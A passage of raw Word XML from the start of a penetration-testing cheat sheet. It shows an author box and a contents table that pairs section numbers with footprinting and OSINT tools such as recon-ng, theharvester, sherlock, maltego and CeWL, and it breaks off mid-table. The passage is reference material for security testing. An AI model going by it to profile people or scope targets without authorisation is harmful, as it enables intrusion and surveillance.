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57F1" w14:textId="12557E05" w:rsidR="00834B5C" w:rsidRDefault="002F2591" w:rsidP="00F93CE3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74D0376B" wp14:editId="2FAE3317">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4230370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:align>top</wp:align>
                </wp:positionV>
                <wp:extent cx="2903220" cy="6781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678180"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5375000E" w14:textId="2E5B29D9" w:rsidR="002F2591" w:rsidRDefault="002F2591">
                            <w:r>
                              <w:t>Author: Adrian Mason</w:t>
                            </w:r>
                            <w:r>
                              <w:br/>
                              <w:t xml:space="preserve">Contact: </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId8" w:history="1">
                              <w:r w:rsidRPr="00F37A7A">
                                <w:rPr>
                                  <w:rStyle w:val="Hyperlink"/>
                                </w:rPr>
                                <w:t>AdrianMason@Hotmail.co.uk</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:br/>
                              <w:t>Version Number: 0.</w:t>
                            </w:r>
                            <w:r w:rsidR="002C366B">
                              <w:t>1</w:t>
                            </w:r>
                            <w:r>
                              <w:t>.</w:t>
                            </w:r>
                            <w:r w:rsidR="002C63AB">
                              <w:t>1</w:t>
                            </w:r>
                            <w:r w:rsidR="00B268A2">
                              <w:t>2</w:t>
                            </w:r>
                            <w:r>
                              <w:t>.</w:t>
                            </w:r>
                            <w:r w:rsidR="002D3BAE">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0376B" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:333.1pt;margin-top:0;width:228.6pt;height:53.4pt;z-index:251659264;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AIAIAAB0EAAAOAAAAZHJzL2Uyb0RvYy54bWysU9uO2yAQfa/Uf0C8N3bcZJN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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5375000E" w14:textId="2E5B29D9" w:rsidR="002F2591" w:rsidRDefault="002F2591">
                      <w:r>
                        <w:t>Author: Adrian Mason</w:t>
                      </w:r>
                      <w:r>
                        <w:br/>
                        <w:t xml:space="preserve">Contact: </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId9" w:history="1">
                        <w:r w:rsidRPr="00F37A7A">
                          <w:rPr>
                            <w:rStyle w:val="Hyperlink"/>
                          </w:rPr>
                          <w:t>AdrianMason@Hotmail.co.uk</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r>
                        <w:br/>
                        <w:t>Version Number: 0.</w:t>
                      </w:r>
                      <w:r w:rsidR="002C366B">
                        <w:t>1</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="002C63AB">
                        <w:t>1</w:t>
                      </w:r>
                      <w:r w:rsidR="00B268A2">
                        <w:t>2</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="002D3BAE">
                        <w:t>9</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchory="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00834B5C" w:rsidRPr="007D2453">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Pen Testing Cheat Sheet</w:t>
      </w:r>
      <w:r w:rsidR="007D2453" w:rsidRPr="007D2453">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007D2453">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DC4261">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:pict w14:anchorId="2411BABC">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587CB78" w14:textId="4D4975EC" w:rsidR="00834B5C" w:rsidRPr="007D2453" w:rsidRDefault="00834B5C" w:rsidP="007D2453">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D2453">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpX="-172" w:tblpY="2611"/>
        <w:tblW w:w="11310" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1671"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="3827"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D2453" w14:paraId="7D23F470" w14:textId="77777777" w:rsidTr="00466824">
        <w:trPr>
          <w:trHeight w:val="84"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7ECA37C0" w14:textId="131C11E4" w:rsidR="0049266F" w:rsidRPr="007D2453" w:rsidRDefault="0049266F" w:rsidP="007D2453">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D2453">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Section Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3D52444A" w14:textId="0E949A04" w:rsidR="0049266F" w:rsidRPr="007D2453" w:rsidRDefault="0049266F" w:rsidP="007D2453">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D2453">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ID Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2EC9B32B" w14:textId="6078D94C" w:rsidR="0049266F" w:rsidRPr="007D2453" w:rsidRDefault="00815DFE" w:rsidP="007D2453">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D2453">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0AEB3A30" w14:textId="56404351" w:rsidR="0049266F" w:rsidRPr="007D2453" w:rsidRDefault="0049266F" w:rsidP="007D2453">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D2453">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Name of Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="18D3B074" w14:textId="77777777" w:rsidTr="000D1EE6">
        <w:trPr>
          <w:trHeight w:val="71"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="676564F2" w14:textId="7A133A30" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>01-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1E0121FC" w14:textId="63683B8F" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="37DE8649" w14:textId="50584FC3" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Planning and Preparation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6ED26759" w14:textId="5A04F937" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Planning and Preparation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="01BFEE9F" w14:textId="77777777" w:rsidTr="000D1EE6">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0C251402" w14:textId="1B476128" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>11-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="008E765A" w14:textId="033DABB0" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="057D373E" w14:textId="173AFAD6" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Footprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2FBD06F0" w14:textId="02352B33" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>whois | nslookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="7C315291"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6D1E6A3C" w14:textId="6DC98D6D"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42DE6F71" w14:textId="3852616C" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6A660E67" w14:textId="4E63D0D5"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684362C7" w14:textId="7CCECCE9" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">internet search engines | </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E71928">
              <w:t>OSINT Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="42191200"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14DD43B7" w14:textId="69A4BC00"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077B8CFD" w14:textId="2AFBD851" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="29DC80A8" w14:textId="445B6F64"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0B407018" w14:textId="463E8008" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcraft | censys | recon-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="4F337A03"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15082C93" w14:textId="364E80FA"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75A2BE4B" w14:textId="08D7DE74" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7F6B3A9A" w14:textId="5FB5CC98"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4FB433C9" w14:textId="4E87A51D" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>theharvester | emt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="1B47CA6F"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78B4F112" w14:textId="0288ED7E"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5091304E" w14:textId="0B11F6FB" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6CF70869" w14:textId="34B99FCF" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Foorprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C0A8972" w14:textId="6D59E93A" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>sherlock | userrecon | followerwonk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="28312060"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05FADC17" w14:textId="6107DB9D"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03DA0758" w14:textId="43367FBB" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5E587C28" w14:textId="76FB1506"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039FE56C" w14:textId="011A141D" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC362B">
              <w:t>entral</w:t>
            </w:r>
            <w:r>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC362B">
              <w:t xml:space="preserve">ps </w:t>
            </w:r>
            <w:r>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC362B">
              <w:t xml:space="preserve"> parsehub</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> | maltego | BillCipher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="2BA233B2"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169C5B6D" w14:textId="1B65F6B9"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076C20D8" w14:textId="2E9CF3B0" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5A34B371" w14:textId="5BA41E62"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50A6EA63" w14:textId="77777777" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>httrack web site copier | CeWL</w:t>
            </w:r>
            <w:r w:rsidR="00536A2C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D4E000" w14:textId="287C80F0" w:rsidR="002A7E1A" w:rsidRDefault="002A7E1A" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>favicon analysis | sitemap.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00132425" w14:paraId="5D8826E0" w14:textId="77777777" w:rsidTr="007D2453">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="149C1A82" w14:textId="3D586766" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>11-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="43B1B54F" w14:textId="6A266D81" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="13856780" w14:textId="0A39AE9D" w:rsidR="00132425" w:rsidRDefault="00132425" w:rsidP="00132425">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Footprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
